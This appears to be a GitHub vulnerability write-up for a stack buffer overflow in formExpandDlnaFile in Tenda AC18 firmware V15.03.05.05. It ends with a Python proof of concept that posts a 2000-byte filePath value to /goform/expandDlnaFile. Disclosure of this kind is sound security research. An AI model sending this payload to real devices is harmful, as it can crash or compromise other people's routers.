Skip to content

Latest commit

 

History

History
34 lines (21 loc) · 1.23 KB

formExpandDlnaFile.md

File metadata and controls

34 lines (21 loc) · 1.23 KB

Overview

Affected version

V15.03.05.05

Vulnerability details

The Tenda AC18 V15.03.05.05 firmware has a stack overflow vulnerability in the formExpandDlnaFile function. The v18 variable receives the filePath parameter from a POST request. The value is directly used in a sprintf function and passes to a local variable on the stack, which can override the return address of the function. The user-provided filePath can trigger this security vulnerability.

image-20240305164522670

image-20240305162856555

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/expandDlnaFile"
payload = b"a"*2000

data = {"filePath": payload}
response = requests.post(url, data=data)
print(response.text)

image-20240305164900093